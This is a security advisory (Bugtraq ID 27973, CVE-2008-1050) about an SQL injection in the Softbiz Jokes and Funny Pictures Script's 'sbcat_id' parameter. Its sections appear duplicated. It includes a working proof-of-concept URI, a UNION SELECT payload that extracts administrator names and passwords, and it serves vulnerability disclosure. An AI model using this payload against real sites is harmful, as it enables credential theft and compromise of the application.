Softbiz Jokes and Funny Pictures Script 'sbcat_id' Parameter SQL Injection Vulnerability
BID:27973
Info
Softbiz Jokes and Funny Pictures Script 'sbcat_id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 27973 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-1050 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 25 2008 12:00AM |
| Updated: | May 07 2015 05:32PM |
| Credit: | -=Mizo=- discovered this vulnerability. |
| Vulnerable: |
SoftBiz Jokes and Funny Pictures Script 0 |
| Not Vulnerable: | |
Discussion
Softbiz Jokes and Funny Pictures Script 'sbcat_id' Parameter SQL Injection Vulnerability
The Jokes and Funny Pictures script from Softbiz is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Jokes and Funny Pictures script from Softbiz is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Softbiz Jokes and Funny Pictures Script 'sbcat_id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/index.php?sbcat_id=-1 union select 0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from sbjks_admin/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/index.php?sbcat_id=-1 union select 0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from sbjks_admin/*
Solution / Fix
Softbiz Jokes and Funny Pictures Script 'sbcat_id' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Softbiz Jokes and Funny Pictures Script 'sbcat_id' Parameter SQL Injection Vulnerability
References:
References:
- Vendor Homepage (Softbiz)
- Softbiz jokes and funny pictures (index.php) sql injection ("Hamza Almersoumi"
)